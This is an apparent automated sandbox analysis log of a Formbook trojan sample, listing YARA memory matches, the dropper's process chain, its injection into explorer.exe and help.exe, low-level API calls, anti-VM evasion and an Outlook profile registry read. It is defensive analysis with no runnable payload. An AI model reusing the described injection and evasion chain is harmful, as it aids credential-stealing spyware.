          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: hvbvmxm.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: help.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: String function: 00ABB150 appears 45 times
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041E087 NtAllocateVirtualMemory,3_2_0041E087
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory,3_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DEA7 NtCreateFile,3_2_0041DEA7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DF57 NtReadFile,3_2_0041DF57
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DFD7 NtClose,3_2_0041DFD7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041E081 NtAllocateVirtualMemory,3_2_0041E081
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004012A4 EntryPoint,NtProtectVirtualMemory,3_2_004012A4
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004014E9 NtProtectVirtualMemory,3_2_004014E9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DF52 NtReadFile,3_2_0041DF52
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DFD2 NtClose,3_2_0041DFD2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00AF98F0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00AF9860
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk,3_2_00AF9840
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk,3_2_00AF99A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00AF9910
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk,3_2_00AF9A20
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AF9A00
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk,3_2_00AF9A50
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF95D0 NtClose,LdrInitializeThunk,3_2_00AF95D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk,3_2_00AF9540
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AF96E0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AF9660
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AF97A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,3_2_00AF9780
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk,3_2_00AF9FE0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,3_2_00AF9710
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF98A0 NtWriteVirtualMemory,3_2_00AF98A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9820 NtEnumerateKey,3_2_00AF9820
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFB040 NtSuspendThread,3_2_00AFB040
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF99D0 NtCreateProcessEx,3_2_00AF99D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9950 NtQueueApcThread,3_2_00AF9950
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A80 NtOpenDirectoryObject,3_2_00AF9A80
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A10 NtQuerySection,3_2_00AF9A10
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFA3B0 NtGetContextThread,3_2_00AFA3B0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9B00 NtSetValueKey,3_2_00AF9B00
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF95F0 NtQueryInformationFile,3_2_00AF95F0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9520 NtWaitForSingleObject,3_2_00AF9520
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFAD30 NtSetContextThread,3_2_00AFAD30
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9560 NtWriteFile,3_2_00AF9560
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF96D0 NtCreateKey,3_2_00AF96D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9610 NtEnumerateValueKey,3_2_00AF9610
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9670 NtQueryInformationProcess,3_2_00AF9670
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9650 NtQueryValueKey,3_2_00AF9650
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9730 NtQueryVirtualMemory,3_2_00AF9730
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFA710 NtOpenProcessToken,3_2_00AFA710
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9760 NtOpenProcess,3_2_00AF9760
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9770 NtSetInformationFile,3_2_00AF9770
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFA770 NtOpenThread,3_2_00AFA770
          Source: Lc8xQv8iZY.exe ReversingLabs: Detection: 48%
          Source: Lc8xQv8iZY.exe Virustotal: Detection: 47%
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File read: C:\Users\user\Desktop\Lc8xQv8iZY.exe
          Source: Lc8xQv8iZY.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\Lc8xQv8iZY.exe C:\Users\user\Desktop\Lc8xQv8iZY.exe
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File created: C:\Users\user\AppData\Local\Temp\nsaAF5E.tmp
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@9/7
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043F5
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Command line argument: ^oA1_2_00416EB0
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: wntdll.pdbUGP source: hvbvmxm.exe, 00000001.00000003.304073189.0000000002740000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000001.00000003.303031511.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: hvbvmxm.exe, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040CC02 push cs; retf 0040h1_2_0040CC21
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AC96 push ecx; ret 1_2_0040ACA9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004210E9 push eax; ret 3_2_004210EF
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004210F2 push eax; ret 3_2_00421159
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0042109C push eax; ret 3_2_004210EF
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00421153 push eax; ret 3_2_00421159
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040EAA3 push ecx; retf 3_2_0040EAA6
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041E5D0 push ecx; iretd 3_2_0041E5D2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00419F38 push edx; ret 3_2_00419F39
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041FF93 push ebx; retf 3_2_0041FF94
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B0D0D1 push ecx; ret 3_2_00B0D0E4
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_1-10895
          Source: C:\Windows\explorer.exe TID: 5288 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 4464 Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE6A60 rdtscp 3_2_00AE6A60
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe API coverage: 6.8 %
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe API coverage: 9.3 %
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00410370 FindFirstFileExW,1_2_00410370
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe API call chain: ExitProcess graph end node graph_0-3335
          Source: explorer.exe, 00000004.00000000.349521692.000000000830B000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.349893553.000000000834F000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000000.317884001.00000000059F0000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000000.324860902.00000000085BD000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.323779585.0000000008394000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.326086945.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: _VMware_SATA_CD00#5&
